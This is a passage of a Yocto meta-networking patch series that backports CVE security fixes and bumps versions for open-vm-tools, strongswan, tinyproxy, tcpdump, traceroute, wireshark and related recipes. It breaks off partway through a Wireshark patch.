open-vm-tools/services/plugins/vix/vixTools.c | 100 ------------------ + 1 file changed, 100 deletions(-) + +diff --git a/open-vm-tools/services/plugins/vix/vixTools.c b/open-vm-tools/services/plugins/vix/vixTools.c +index bde74021..6e51d1f4 100644 +--- a/open-vm-tools/services/plugins/vix/vixTools.c ++++ b/open-vm-tools/services/plugins/vix/vixTools.c +@@ -254,7 +254,6 @@ char *gImpersonatedUsername = NULL; + #define VIX_TOOLS_CONFIG_API_AUTHENTICATION "Authentication" + #define VIX_TOOLS_CONFIG_AUTHTYPE_AGENTS "InfrastructureAgents" + +-#define VIX_TOOLS_CONFIG_INFRA_AGENT_DISABLED_DEFAULT TRUE + + /* + * The switch that controls all APIs +@@ -730,8 +729,6 @@ VixError GuestAuthSAMLAuthenticateAndImpersonate( + + void GuestAuthUnimpersonate(); + +-static Bool VixToolsCheckIfAuthenticationTypeEnabled(GKeyFile *confDictRef, +- const char *typeName); + + #if SUPPORT_VGAUTH + +@@ -7913,29 +7910,6 @@ VixToolsImpersonateUser(VixCommandRequestHeader *requestMsg, // IN + userToken); + break; + } +- case VIX_USER_CREDENTIAL_ROOT: +- { +- if ((requestMsg->requestFlags & VIX_REQUESTMSG_HAS_HASHED_SHARED_SECRET) && +- !VixToolsCheckIfAuthenticationTypeEnabled(gConfDictRef, +- VIX_TOOLS_CONFIG_AUTHTYPE_AGENTS)) { +- /* +- * Don't accept hashed shared secret if disabled. +- */ +- g_message("%s: Requested authentication type has been disabled.\n", +- __FUNCTION__); +- err = VIX_E_GUEST_AUTHTYPE_DISABLED; +- goto done; +- } +- } +- // fall through +- +- case VIX_USER_CREDENTIAL_CONSOLE_USER: +- err = VixToolsImpersonateUserImplEx(NULL, +- credentialType, +- NULL, +- loadUserProfile, +- userToken); +- break; + case VIX_USER_CREDENTIAL_NAME_PASSWORD: + case VIX_USER_CREDENTIAL_NAME_PASSWORD_OBFUSCATED: + case VIX_USER_CREDENTIAL_NAMED_INTERACTIVE_USER: +@@ -8104,36 +8078,6 @@ VixToolsImpersonateUserImplEx(char const *credentialTypeStr, // IN + } + } + +- /* +- * If the VMX asks to be root, then we allow them. +- * The VMX will make sure that only it will pass this value in, +- * and only when the VM and host are configured to allow this. +- */ +- if ((VIX_USER_CREDENTIAL_ROOT == credentialType) +- && (thisProcessRunsAsRoot)) { +- *userToken = PROCESS_CREATOR_USER_TOKEN; +- +- gImpersonatedUsername = Util_SafeStrdup("_ROOT_"); +- err = VIX_OK; +- goto quit; +- } +- +- /* +- * If the VMX asks to be root, then we allow them. +- * The VMX will make sure that only it will pass this value in, +- * and only when the VM and host are configured to allow this. +- * +- * XXX This has been deprecated XXX +- */ +- if ((VIX_USER_CREDENTIAL_CONSOLE_USER == credentialType) +- && ((allowConsoleUserOps) || !(thisProcessRunsAsRoot))) { +- *userToken = PROCESS_CREATOR_USER_TOKEN; +- +- gImpersonatedUsername = Util_SafeStrdup("_CONSOLE_USER_NAME_"); +- err = VIX_OK; +- goto quit; +- } +- + /* + * If the VMX asks us to run commands in the context of the current + * user, make sure that the user who requested the command is the +@@ -10814,50 +10758,6 @@ VixToolsCheckIfVixCommandEnabled(int opcode, // IN + } + + +-/* +- *----------------------------------------------------------------------------- +- * +- * VixToolsCheckIfAuthenticationTypeEnabled -- +- * +- * Checks to see if a given authentication type has been +- * disabled via the tools configuration. +- * +- * Return value: +- * TRUE if enabled, FALSE otherwise. +- * +- * Side effects: +- * None +- * +- *----------------------------------------------------------------------------- +- */ +- +-static Bool +-VixToolsCheckIfAuthenticationTypeEnabled(GKeyFile *confDictRef, // IN +- const char *typeName) // IN +-{ +- char authnDisabledName[64]; // Authentication.<AuthenticationType>.disabled +- gboolean disabled; +- +- Str_Snprintf(authnDisabledName, sizeof(authnDisabledName), +- VIX_TOOLS_CONFIG_API_AUTHENTICATION ".%s.disabled", +- typeName); +- +- ASSERT(confDictRef != NULL); +- +- /* +- * XXX Skip doing the strcmp() to verify the auth type since we only +- * have the one typeName (VIX_TOOLS_CONFIG_AUTHTYPE_AGENTS), and default +- * it to VIX_TOOLS_CONFIG_INFRA_AGENT_DISABLED_DEFAULT. +- */ +- disabled = VMTools_ConfigGetBoolean(confDictRef, +- VIX_TOOLS_CONFIG_API_GROUPNAME, +- authnDisabledName, +- VIX_TOOLS_CONFIG_INFRA_AGENT_DISABLED_DEFAULT); +- +- return !disabled; +-} +- +- + /* + *----------------------------------------------------------------------------- + * +-- +2.40.0 diff --git a/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-20900.patch b/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-20900.patch new file mode 100644 index 0000000000..1b51e500aa --- /dev/null +++ b/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-20900.patch @@ -0,0 +1,36 @@ +From 108d81c70d0a6792847051d121a660ef3511517d Mon Sep 17 00:00:00 2001 +From: Katy Feng <fkaty@vmware.com> +Date: Fri, 22 Sep 2023 10:15:58 +0000 +Subject: [PATCH] Allow only X509 certs to verify the SAML token signature. + +CVE: CVE-2023-20900 + +Upstream-Status: Backport [https://github.com/vmware/open-vm-tools/commit/74b6d0d9000eda1a2c8f31c40c725fb0b8520b16] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c | 9 ++++++++- + 1 file changed, 8 insertions(+), 1 deletion(-) + +diff --git a/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c b/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c +index aaa5082a..ad8fe304 100644 +--- a/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c ++++ b/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c +@@ -1273,7 +1273,14 @@ VerifySignature(xmlDocPtr doc, + */ + bRet = RegisterID(xmlDocGetRootElement(doc), "ID"); + if (bRet == FALSE) { +- g_warning("failed to register ID\n"); ++ g_warning("Failed to register ID\n"); ++ goto done; ++ } ++ ++ /* Use only X509 certs to validate the signature */ ++ if (xmlSecPtrListAdd(&(dsigCtx->keyInfoReadCtx.enabledKeyData), ++ BAD_CAST xmlSecKeyDataX509Id) < 0) { ++ g_warning("Failed to limit allowed key data\n"); + goto done; + } + +-- +2.40.0 diff --git a/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-34058.patch b/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-34058.patch new file mode 100644 index 0000000000..d24dd3695c --- /dev/null +++ b/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-34058.patch @@ -0,0 +1,241 @@ +From 6822b5a84f8cfa60d46479d6b8f1c63eb85eac87 Mon Sep 17 00:00:00 2001 +From: John Wolfe <jwolfe@vmware.com> +Date: Wed, 18 Oct 2023 09:04:07 -0700 +Subject: [PATCH] Address CVE-2023-34058 + +VGAuth: don't accept tokens with unrelated certs. + +CVE: CVE-2023-34058 + +Upstream-Status: Backport [https://github.com/vmware/open-vm-tools/commit/e5be40b9cc025d03ccd5689ef9192d29abd68bfe] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + open-vm-tools/vgauth/common/certverify.c | 145 ++++++++++++++++++ + open-vm-tools/vgauth/common/certverify.h | 4 + + open-vm-tools/vgauth/common/prefs.h | 2 + + .../vgauth/serviceImpl/saml-xmlsec1.c | 14 ++ + 4 files changed, 165 insertions(+) + +diff --git a/open-vm-tools/vgauth/common/certverify.c b/open-vm-tools/vgauth/common/certverify.c +index edf54928..29b12df3 100644 +--- a/open-vm-tools/vgauth/common/certverify.c ++++ b/open-vm-tools/vgauth/common/certverify.c +@@ -893,3 +893,148 @@ done: + + return err; + } ++ ++ ++/* ++ * Finds a cert with a subject (if checkSubj is set) or issuer (if ++ * checkSUbj is unset), matching 'val' in the list ++ * of certs. Returns a match or NULL. ++ */ ++ ++static X509 * ++FindCert(GList *cList, ++ X509_NAME *val, ++ int checkSubj) ++{ ++ GList *l; ++ X509 *c; ++ X509_NAME *v; ++ ++ l = cList; ++ while (l != NULL) { ++ c = (X509 *) l->data; ++ if (checkSubj) { ++ v = X509_get_subject_name(c); ++ } else { ++ v = X509_get_issuer_name(c); ++ } ++ if (X509_NAME_cmp(val, v) == 0) { ++ return c; ++ } ++ l = l->next; ++ } ++ return NULL; ++} ++ ++ ++/* ++ ****************************************************************************** ++ * CertVerify_CheckForUnrelatedCerts -- */ /** ++ * ++ * Looks over a list of certs. If it finds that they are not all ++ * part of the same chain, returns failure. ++ * ++ * @param[in] numCerts The number of certs in the chain. ++ * @param[in] pemCerts The chain of certificates to verify. ++ * ++ * @return VGAUTH_E_OK on success, VGAUTH_E_FAIL if unrelated certs are found. ++ * ++ ****************************************************************************** ++ */ ++ ++VGAuthError ++CertVerify_CheckForUnrelatedCerts(int numCerts, ++ const char **pemCerts) ++{ ++ VGAuthError err = VGAUTH_E_FAIL; ++ int chainLen = 0; ++ int i; ++ X509 **certs = NULL; ++ GList *rawList = NULL; ++ X509 *baseCert; ++ X509 *curCert; ++ X509_NAME *subject; ++ X509_NAME *issuer; ++ ++ /* common single cert case; nothing to do */ ++ if (numCerts == 1) { ++ return VGAUTH_E_OK; ++ } ++ ++ /* convert all PEM to X509 objects */ ++ certs = g_malloc0(numCerts * sizeof(X509 *)); ++ for (i = 0; i < numCerts; i++) { ++ certs[i] = CertStringToX509(pemCerts[i]); ++ if (NULL == certs[i]) { ++ g_warning("%s: failed to convert cert to X509\n", __FUNCTION__); ++ goto done; ++ } ++ } ++ ++ /* choose the cert to start the chain. shouldn't matter which */ ++ baseCert = certs[0]; ++ ++ /* put the rest into a list */ ++ for (i = 1; i < numCerts; i++) { ++ rawList = g_list_append(rawList, certs[i]); ++ } ++ ++ /* now chase down to a leaf, looking for certs the baseCert issued */ ++ subject = X509_get_subject_name(baseCert); ++ while ((curCert = FindCert(rawList, subject, 0)) != NULL) { ++ /* pull it from the list */ ++ rawList = g_list_remove(rawList, curCert); ++ /* set up the next find */ ++ subject = X509_get_subject_name(curCert); ++ } ++ ++ /* ++ * walk up to the root cert, by finding a cert where the ++ * issuer equals the subject of the current ++ */ ++ issuer = X509_get_issuer_name(baseCert); ++ while ((curCert = FindCert(rawList, issuer, 1)) != NULL) { ++ /* pull it from the list */ ++ rawList = g_list_remove(rawList, curCert); ++ /* set up the next find */ ++ issuer = X509_get_issuer_name(curCert); ++ } ++ ++ /* ++ * At this point, anything on the list should be certs that are not part ++ * of the chain that includes the original 'baseCert'. ++ * ++ * For a valid token, the list should be empty. ++ */ ++ chainLen = g_list_length(rawList); ++ if (chainLen != 0 ) { ++ GList *l; ++ ++ g_warning("%s: %d unrelated certs found in list\n", ++ __FUNCTION__, chainLen); ++ ++ /* debug helper */ ++ l = rawList; ++ while (l != NULL) { ++ X509* c = (X509 *) l->data; ++ char *s = X509_NAME_oneline(X509_get_subject_name(c), NULL, 0); ++ ++ g_debug("%s: unrelated cert subject: %s\n", __FUNCTION__, s); ++ free(s); ++ l = l->next; ++ } ++ ++ goto done; ++ } ++ ++ g_debug("%s: Success! no unrelated certs found\n", __FUNCTION__); ++ err = VGAUTH_E_OK; ++ ++done: ++ g_list_free(rawList); ++ for (i = 0; i < numCerts; i++) { ++ X509_free(certs[i]); ++ } ++ g_free(certs); ++ return err; ++} +diff --git a/open-vm-tools/vgauth/common/certverify.h b/open-vm-tools/vgauth/common/certverify.h +index d7c6410b..f582bb82 100644 +--- a/open-vm-tools/vgauth/common/certverify.h ++++ b/open-vm-tools/vgauth/common/certverify.h +@@ -67,6 +67,10 @@ VGAuthError CertVerify_CheckSignatureUsingCert(VGAuthHashAlg hash, + size_t signatureLen, + const unsigned char *signature); + ++ ++VGAuthError CertVerify_CheckForUnrelatedCerts(int numCerts, ++ const char **pemCerts); ++ + gchar * CertVerify_StripPEMCert(const gchar *pemCert); + + gchar * CertVerify_CertToX509String(const gchar *pemCert); +diff --git a/open-vm-tools/vgauth/common/prefs.h b/open-vm-tools/vgauth/common/prefs.h +index ff116928..87ccc9b3 100644 +--- a/open-vm-tools/vgauth/common/prefs.h ++++ b/open-vm-tools/vgauth/common/prefs.h +@@ -136,6 +136,8 @@ msgCatalog = /etc/vmware-tools/vgauth/messages + #define VGAUTH_PREF_ALIASSTORE_DIR "aliasStoreDir" + /** The number of seconds slack allowed in either direction in SAML token date checks. */ + #define VGAUTH_PREF_CLOCK_SKEW_SECS "clockSkewAdjustment" ++/** If unrelated certificates are allowed in a SAML token */ ++#define VGAUTH_PREF_ALLOW_UNRELATED_CERTS "allowUnrelatedCerts" + + /** Ticket group name. */ + #define VGAUTH_PREF_GROUP_NAME_TICKET "ticket" +diff --git a/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c b/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c +index aaa5082a..17b56de9 100644 +--- a/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c ++++ b/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c +@@ -47,6 +47,7 @@ + #include "vmxlog.h" + + static int gClockSkewAdjustment = VGAUTH_PREF_DEFAULT_CLOCK_SKEW_SECS; ++static gboolean gAllowUnrelatedCerts = FALSE; + static xmlSchemaPtr gParsedSchemas = NULL; + static xmlSchemaValidCtxtPtr gSchemaValidateCtx = NULL; + +@@ -313,6 +314,10 @@ LoadPrefs(void) + VGAUTH_PREF_DEFAULT_CLOCK_SKEW_SECS); + Log("%s: Allowing %d of clock skew for SAML date validation\n", + __FUNCTION__, gClockSkewAdjustment); ++ gAllowUnrelatedCerts = Pref_GetBool(gPrefs, ++ VGAUTH_PREF_ALLOW_UNRELATED_CERTS, ++ VGAUTH_PREF_GROUP_NAME_SERVICE, ++ FALSE); + } + + +@@ -1526,6 +1531,15 @@ SAML_VerifyBearerTokenAndChain(const char *xmlText, + if (FALSE == bRet) { + return VGAUTH_E_AUTHENTICATION_DENIED; + } ++ if (!gAllowUnrelatedCerts) { ++ err = CertVerify_CheckForUnrelatedCerts(num, (const char **) certChain); ++ if (err != VGAUTH_E_OK) { ++ VMXLog_Log(VMXLOG_LEVEL_WARNING, ++ "Unrelated certs found in SAML token, failing\n"); ++ return VGAUTH_E_AUTHENTICATION_DENIED; ++ } ++ } ++ + + subj.type = SUBJECT_TYPE_NAMED; + subj.name = *subjNameOut; +-- +2.40.0 diff --git a/meta-networking/recipes-support/open-vm-tools/open-vm-tools_11.3.5.bb b/meta-networking/recipes-support/open-vm-tools/open-vm-tools_11.3.5.bb index 4670a85a67..c54fd4de48 100644 --- a/meta-networking/recipes-support/open-vm-tools/open-vm-tools_11.3.5.bb +++ b/meta-networking/recipes-support/open-vm-tools/open-vm-tools_11.3.5.bb @@ -45,6 +45,9 @@ SRC_URI = "git://github.com/vmware/open-vm-tools.git;protocol=https;branch=maste file://0002-hgfsServerLinux-Consider-64bit-time_t-possibility.patch;patchdir=.. \ file://0001-open-vm-tools-Correct-include-path-for-poll.h.patch;patchdir=.. \ file://0001-Properly-check-authorization-on-incoming-guestOps-re.patch;patchdir=.. \ + file://CVE-2023-20867.patch;patchdir=.. \ + file://CVE-2023-20900.patch;patchdir=.. \ + file://CVE-2023-34058.patch;patchdir=.. \ " UPSTREAM_CHECK_GITTAGREGEX = "stable-(?P<pver>\d+(\.\d+)+)" diff --git a/meta-networking/recipes-support/openvpn/openvpn_2.5.6.bb b/meta-networking/recipes-support/openvpn/openvpn_2.5.6.bb index 218e72b7a8..828cd5033e 100644 --- a/meta-networking/recipes-support/openvpn/openvpn_2.5.6.bb +++ b/meta-networking/recipes-support/openvpn/openvpn_2.5.6.bb @@ -19,6 +19,9 @@ SRC_URI[sha256sum] = "333a7ef3d5b317968aca2c77bdc29aa7c6d6bb3316eb3f79743b59c532 # CVE-2020-7224 and CVE-2020-27569 are for Aviatrix OpenVPN client, not for openvpn. CVE_CHECK_IGNORE += "CVE-2020-7224 CVE-2020-27569" +# CVE-2023-7235 is specific to Windows platform +CVE_CHECK_IGNORE += "CVE-2023-7235" + SYSTEMD_SERVICE:${PN} += "openvpn@loopback-server.service openvpn@loopback-client.service" SYSTEMD_AUTO_ENABLE = "disable" diff --git a/meta-networking/recipes-support/spice/spice-protocol_0.14.4.bb b/meta-networking/recipes-support/spice/spice-protocol_0.14.4.bb index 9ce019ed86..3c8458baac 100644 --- a/meta-networking/recipes-support/spice/spice-protocol_0.14.4.bb +++ b/meta-networking/recipes-support/spice/spice-protocol_0.14.4.bb @@ -16,4 +16,6 @@ S = "${WORKDIR}/git" inherit meson pkgconfig +ALLOW_EMPTY:${PN} = "1" + BBCLASSEXTEND = "native nativesdk" diff --git a/meta-networking/recipes-support/strongswan/files/CVE-2022-40617.patch b/meta-networking/recipes-support/strongswan/files/CVE-2022-40617.patch new file mode 100644 index 0000000000..ffef6800eb --- /dev/null +++ b/meta-networking/recipes-support/strongswan/files/CVE-2022-40617.patch @@ -0,0 +1,157 @@ +From 6a6c275534e31b41f6d203cfd92685b7526a45e8 Mon Sep 17 00:00:00 2001 +From: Hitendra Prajapati <hprajapati@mvista.com> +Date: Fri, 11 Nov 2022 10:15:38 +0530 +Subject: [PATCH] CVE-2022-40617 + +Upstream-Status: Backport [https://download.strongswan.org/security/CVE-2022-40617] +CVE: CVE-2022-40617 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> + +credential-manager: Do online revocation checks only after + basic trust chain validation + +This avoids querying URLs of potentially untrusted certificates, e.g. if +an attacker sends a specially crafted end-entity and intermediate CA +certificate with a CDP that points to a server that completes the +TCP handshake but then does not send any further data, which will block +the fetcher thread (depending on the plugin) for as long as the default +timeout for TCP. Doing that multiple times will block all worker threads, +leading to a DoS attack. + +The logging during the certificate verification obviously changes. +--- + .../credentials/credential_manager.c | 54 +++++++++++++++---- + 1 file changed, 45 insertions(+), 9 deletions(-) + +diff --git a/src/libstrongswan/credentials/credential_manager.c b/src/libstrongswan/credentials/credential_manager.c +index 3be0190..f65372b 100644 +--- a/src/libstrongswan/credentials/credential_manager.c ++++ b/src/libstrongswan/credentials/credential_manager.c +@@ -555,7 +555,7 @@ static void cache_queue(private_credential_manager_t *this) + */ + static bool check_lifetime(private_credential_manager_t *this, + certificate_t *cert, char *label, +- int pathlen, bool trusted, auth_cfg_t *auth) ++ int pathlen, bool anchor, auth_cfg_t *auth) + { + time_t not_before, not_after; + cert_validator_t *validator; +@@ -570,7 +570,7 @@ static bool check_lifetime(private_credential_manager_t *this, + continue; + } + status = validator->check_lifetime(validator, cert, +- pathlen, trusted, auth); ++ pathlen, anchor, auth); + if (status != NEED_MORE) + { + break; +@@ -603,13 +603,13 @@ static bool check_lifetime(private_credential_manager_t *this, + */ + static bool check_certificate(private_credential_manager_t *this, + certificate_t *subject, certificate_t *issuer, bool online, +- int pathlen, bool trusted, auth_cfg_t *auth) ++ int pathlen, bool anchor, auth_cfg_t *auth) + { + cert_validator_t *validator; + enumerator_t *enumerator; + + if (!check_lifetime(this, subject, "subject", pathlen, FALSE, auth) || +- !check_lifetime(this, issuer, "issuer", pathlen + 1, trusted, auth)) ++ !check_lifetime(this, issuer, "issuer", pathlen + 1, anchor, auth)) + { + return FALSE; + } +@@ -622,7 +622,7 @@ static bool check_certificate(private_credential_manager_t *this, + continue; + } + if (!validator->validate(validator, subject, issuer, +- online, pathlen, trusted, auth)) ++ online, pathlen, anchor, auth)) + { + enumerator->destroy(enumerator); + return FALSE; +@@ -725,6 +725,7 @@ static bool verify_trust_chain(private_credential_manager_t *this, + auth_cfg_t *auth; + signature_params_t *scheme; + int pathlen; ++ bool is_anchor = FALSE; + + auth = auth_cfg_create(); + get_key_strength(subject, auth); +@@ -742,7 +743,7 @@ static bool verify_trust_chain(private_credential_manager_t *this, + auth->add(auth, AUTH_RULE_CA_CERT, issuer->get_ref(issuer)); + DBG1(DBG_CFG, " using trusted ca certificate \"%Y\"", + issuer->get_subject(issuer)); +- trusted = TRUE; ++ trusted = is_anchor = TRUE; + } + else + { +@@ -777,11 +778,18 @@ static bool verify_trust_chain(private_credential_manager_t *this, + DBG1(DBG_CFG, " issuer is \"%Y\"", + current->get_issuer(current)); + call_hook(this, CRED_HOOK_NO_ISSUER, current); ++ if (trusted) ++ { ++ DBG1(DBG_CFG, " reached end of incomplete trust chain for " ++ "trusted certificate \"%Y\"", ++ subject->get_subject(subject)); ++ } + break; + } + } +- if (!check_certificate(this, current, issuer, online, +- pathlen, trusted, auth)) ++ /* don't do online verification here */ ++ if (!check_certificate(this, current, issuer, FALSE, ++ pathlen, is_anchor, auth)) + { + trusted = FALSE; + issuer->destroy(issuer); +@@ -793,7 +801,7 @@ static bool verify_trust_chain(private_credential_manager_t *this, + } + current->destroy(current); + current = issuer; +- if (trusted) ++ if (is_anchor) + { + DBG1(DBG_CFG, " reached self-signed root ca with a " + "path length of %d", pathlen); +@@ -806,6 +814,34 @@ static bool verify_trust_chain(private_credential_manager_t *this, + DBG1(DBG_CFG, "maximum path length of %d exceeded", MAX_TRUST_PATH_LEN); + call_hook(this, CRED_HOOK_EXCEEDED_PATH_LEN, subject); + } ++ else if (trusted && online) ++ { ++ enumerator_t *enumerator; ++ auth_rule_t rule; ++ ++ /* do online revocation checks after basic validation of the chain */ ++ pathlen = 0; ++ current = subject; ++ enumerator = auth->create_enumerator(auth); ++ while (enumerator->enumerate(enumerator, &rule, &issuer)) ++ { ++ if (rule == AUTH_RULE_CA_CERT || rule == AUTH_RULE_IM_CERT) ++ { ++ if (!check_certificate(this, current, issuer, TRUE, pathlen++, ++ rule == AUTH_RULE_CA_CERT, auth)) ++ { ++ trusted = FALSE; ++ break; ++ } ++ else if (rule == AUTH_RULE_CA_CERT) ++ { ++ break; ++ } ++ current = issuer; ++ } ++ } ++ enumerator->destroy(enumerator); ++ } + if (trusted) + { + result->merge(result, auth, FALSE); +-- +2.25.1 + diff --git a/meta-networking/recipes-support/strongswan/strongswan_5.9.6.bb b/meta-networking/recipes-support/strongswan/strongswan_5.9.13.bb index 1b82dceac2..afa1a684b1 100644 --- a/meta-networking/recipes-support/strongswan/strongswan_5.9.6.bb +++ b/meta-networking/recipes-support/strongswan/strongswan_5.9.13.bb @@ -8,11 +8,10 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" DEPENDS = "flex-native flex bison-native" DEPENDS:append = "${@bb.utils.contains('DISTRO_FEATURES', 'tpm2', ' tpm2-tss', '', d)}" -SRC_URI = "http://download.strongswan.org/strongswan-${PV}.tar.bz2 \ - file://0001-enum-Fix-compiler-warning.patch \ +SRC_URI = "https://download.strongswan.org/strongswan-${PV}.tar.bz2 \ " -SRC_URI[sha256sum] = "91d0978ac448912759b85452d8ff0d578aafd4507aaf4f1c1719f9d0c7318ab7" +SRC_URI[sha256sum] = "56e30effb578fd9426d8457e3b76c8c3728cd8a5589594b55649b2719308ba55" UPSTREAM_CHECK_REGEX = "strongswan-(?P<pver>\d+(\.\d+)+)\.tar" @@ -40,7 +39,6 @@ PACKAGECONFIG[gmp] = "--enable-gmp,--disable-gmp,gmp,${PN}-plugin-gmp" PACKAGECONFIG[ldap] = "--enable-ldap,--disable-ldap,openldap,${PN}-plugin-ldap" PACKAGECONFIG[mysql] = "--enable-mysql,--disable-mysql,mysql5,${PN}-plugin-mysql" PACKAGECONFIG[openssl] = "--enable-openssl,--disable-openssl,openssl,${PN}-plugin-openssl" -PACKAGECONFIG[scep] = "--enable-scepclient,--disable-scepclient," PACKAGECONFIG[soup] = "--enable-soup,--disable-soup,libsoup-2.4,${PN}-plugin-soup" PACKAGECONFIG[sqlite3] = "--enable-sqlite,--disable-sqlite,sqlite3,${PN}-plugin-sqlite" PACKAGECONFIG[stroke] = "--enable-stroke,--disable-stroke,,${PN}-plugin-stroke" @@ -145,11 +143,16 @@ RDEPENDS:${PN} += "\ ${PN}-plugin-attr \ ${PN}-plugin-cmac \ ${PN}-plugin-constraints \ + ${PN}-plugin-drbg \ + ${PN}-plugin-fips-prf \ ${PN}-plugin-des \ ${PN}-plugin-dnskey \ + ${PN}-plugin-gcm \ ${PN}-plugin-hmac \ + ${PN}-plugin-kdf \ ${PN}-plugin-kernel-netlink \ ${PN}-plugin-md5 \ + ${PN}-plugin-mgf1 \ ${PN}-plugin-nonce \ ${PN}-plugin-pem \ ${PN}-plugin-pgp \ diff --git a/meta-networking/recipes-support/tcpdump/tcpdump_4.99.1.bb b/meta-networking/recipes-support/tcpdump/tcpdump_4.99.4.bb index 322a826f07..803a9bb5f5 100644 --- a/meta-networking/recipes-support/tcpdump/tcpdump_4.99.1.bb +++ b/meta-networking/recipes-support/tcpdump/tcpdump_4.99.4.bb @@ -26,8 +26,7 @@ SRC_URI = " \ file://run-ptest \ " -SRC_URI[md5sum] = "929a255c71a9933608bd7c31927760f7" -SRC_URI[sha256sum] = "79b36985fb2703146618d87c4acde3e068b91c553fb93f021a337f175fd10ebe" +SRC_URI[sha256sum] = "0232231bb2f29d6bf2426e70a08a7e0c63a0d59a9b44863b7f5e2357a6e49fea" UPSTREAM_CHECK_REGEX = "tcpdump-(?P<pver>\d+(\.\d+)+)\.tar" diff --git a/meta-networking/recipes-support/tcpreplay/tcpreplay_4.4.2.bb b/meta-networking/recipes-support/tcpreplay/tcpreplay_4.4.4.bb index 165a0e735b..1e2495efd6 100644 --- a/meta-networking/recipes-support/tcpreplay/tcpreplay_4.4.2.bb +++ b/meta-networking/recipes-support/tcpreplay/tcpreplay_4.4.4.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://docs/LICENSE;md5=10f0474a2f0e5dccfca20f69d6598ad8" SRC_URI = "https://github.com/appneta/tcpreplay/releases/download/v${PV}/tcpreplay-${PV}.tar.gz" -SRC_URI[sha256sum] = "5b272cd83b67d6288a234ea15f89ecd93b4fadda65eddc44e7b5fcb2f395b615" +SRC_URI[sha256sum] = "44f18fb6d3470ecaf77a51b901a119dae16da5be4d4140ffbb2785e37ad6d4bf" UPSTREAM_CHECK_URI = "https://github.com/appneta/tcpreplay/releases" diff --git a/meta-networking/recipes-support/tinyproxy/tinyproxy/CVE-2022-40468.patch b/meta-networking/recipes-support/tinyproxy/tinyproxy/CVE-2022-40468.patch new file mode 100644 index 0000000000..4e2157ca75 --- /dev/null +++ b/meta-networking/recipes-support/tinyproxy/tinyproxy/CVE-2022-40468.patch @@ -0,0 +1,33 @@ +From 3764b8551463b900b5b4e3ec0cd9bb9182191cb7 Mon Sep 17 00:00:00 2001 +From: rofl0r <rofl0r@users.noreply.github.com> +Date: Thu, 8 Sep 2022 15:18:04 +0000 +Subject: [PATCH] prevent junk from showing up in error page in invalid + requests + +fixes #457 + +https://github.com/tinyproxy/tinyproxy/commit/3764b8551463b900b5b4e3ec0cd9bb9182191cb7 +Upstream-Status: Backport +CVE: CVE-2022-40468 +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> +--- + src/reqs.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/src/reqs.c b/src/reqs.c +index bce69819..45db118d 100644 +--- a/src/reqs.c ++++ b/src/reqs.c +@@ -343,8 +343,12 @@ static struct request_s *process_request (struct conn_s *connptr, + goto fail; + } + ++ /* zero-terminate the strings so they don't contain junk in error page */ ++ request->method[0] = url[0] = request->protocol[0] = 0; ++ + ret = sscanf (connptr->request_line, "%[^ ] %[^ ] %[^ ]", + request->method, url, request->protocol); ++ + if (ret == 2 && !strcasecmp (request->method, "GET")) { + request->protocol[0] = 0; + diff --git a/meta-networking/recipes-support/tinyproxy/tinyproxy_1.11.0.bb b/meta-networking/recipes-support/tinyproxy/tinyproxy_1.11.0.bb index 388f7aecbb..4ddb202268 100644 --- a/meta-networking/recipes-support/tinyproxy/tinyproxy_1.11.0.bb +++ b/meta-networking/recipes-support/tinyproxy/tinyproxy_1.11.0.bb @@ -7,6 +7,7 @@ SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/${PV}/${BP}.tar.gz file://disable-documentation.patch \ file://tinyproxy.service \ file://tinyproxy.conf \ + file://CVE-2022-40468.patch \ " SRC_URI[md5sum] = "658db5558ffb849414341b756a546a99" diff --git a/meta-networking/recipes-support/traceroute/traceroute_2.1.0.bb b/meta-networking/recipes-support/traceroute/traceroute_2.1.3.bb index 9cac204998..ed75ba34de 100644 --- a/meta-networking/recipes-support/traceroute/traceroute_2.1.0.bb +++ b/meta-networking/recipes-support/traceroute/traceroute_2.1.3.bb @@ -17,8 +17,7 @@ UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/traceroute/files/tracerou SRC_URI = "${SOURCEFORGE_MIRROR}/traceroute/traceroute/${BP}/${BP}.tar.gz \ " -SRC_URI[md5sum] = "84d329d67abc3fb83fc8cb12aeaddaba" -SRC_URI[sha256sum] = "3669d22a34d3f38ed50caba18cd525ba55c5c00d5465f2d20d7472e5d81603b6" +SRC_URI[sha256sum] = "05ebc7aba28a9100f9bbae54ceecbf75c82ccf46bdfce8b5d64806459a7e0412" EXTRA_OEMAKE = "VPATH=${STAGING_LIBDIR}" LTOEXTRA += "-flto-partition=none" diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2022-4345.patch b/meta-networking/recipes-support/wireshark/files/CVE-2022-4345.patch new file mode 100644 index 0000000000..ccf04459e8 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2022-4345.patch @@ -0,0 +1,52 @@ +From 39db474f80af87449ce0f034522dccc80ed4153f Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Thu, 1 Dec 2022 20:46:15 -0500 +Subject: [PATCH] openflow_v6: Prevent infinite loops in too short ofp_stats + +The ofp_stats struct length field includes the fixed 4 bytes. +If the length is smaller than that, report the length error +and break out. In particular, a 